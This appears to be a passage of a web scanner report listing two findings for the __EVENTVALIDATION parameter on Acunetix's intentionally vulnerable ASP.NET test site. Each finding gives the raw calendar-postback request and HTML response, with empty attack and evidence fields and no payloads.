Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8280&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAPhR2jNoIZGRkDD0MGhfGdKbpZ3wym9XSgphN8N0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ9teOBwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAt1JSDN8Z0viiOGr49yiHNKsK5f5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:49 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAPhR2jNoIZGRkDD0MGhfGdKbpZ3wym9XSgphN8N0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ9teOBwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAt1JSDN8Z0viiOGr49yiHNKsK5f5" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:White" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8554&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAbXnFY9sIZGRkOrJ2mI4SDLheMgc4LlRbUuzBVaM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ9YLADAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMEIwEJpx6OJCvPyh8KwQJVN52WFE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:55 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAbXnFY9sIZGRkOrJ2mI4SDLheMgc4LlRbUuzBVaM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ9YLADAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMEIwEJpx6OJCvPyh8KwQJVN52WFE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:White" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, 